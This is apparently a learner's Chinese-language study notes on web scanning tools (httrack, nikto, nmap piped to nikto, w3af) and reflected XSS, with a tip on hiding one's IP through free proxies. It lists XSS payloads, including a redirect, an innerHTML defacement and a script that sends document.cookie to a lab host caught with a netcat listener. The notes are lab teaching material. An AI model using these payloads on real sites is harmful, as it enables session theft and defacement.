web扫描工具
*
httrack:克隆目标网站,下载所能得到的目标网站的所有文件,减少与目标系统交互
www.hidemyass.com:获取免费代理服务器,隐藏IP
*
nikto:搜索存在安全隐患的文件,服务器配置漏洞
shellshock:
https:默认443端口
http:默认80端口
结合nmap扫描开着80端口的内网IP的可利用漏洞
$nmap -p80 192.168.1.0/24 -oG - | nikto -host -
* w3af:可扩展的web扫描器
懒得看视频了…明天再看趴…
xss攻击
反射型xss
<a href="http://192.168.174.138">click</a>
<script>alert('www')</script>
<a href='' onclick=alert('xss')>type</a>
<img src=http://192.168.1.1/a.jpg onerror=alert('xss')>#
<script>window.location="https://www.baidu.com"</script> 重定向 $nc -vnlp 80 侦听端口
<iframe src="http://192.168.174.138"></iframe> <script>new Image().src=
"http://192.168.1.131/c.php?output=''+document.cookie;</script> 传送cookie <script
>document.body.innerHTML="<div style=visbility.visible;><h1>hhh</h1></div>";</
script>
因为kali的监听有点问题…所以就没有截图了…反正应该都懂…
未完待续,感觉xss看了一节课,跟没看一样的,这些漏洞都过于基础了…继续学吧…
热门工具 换一换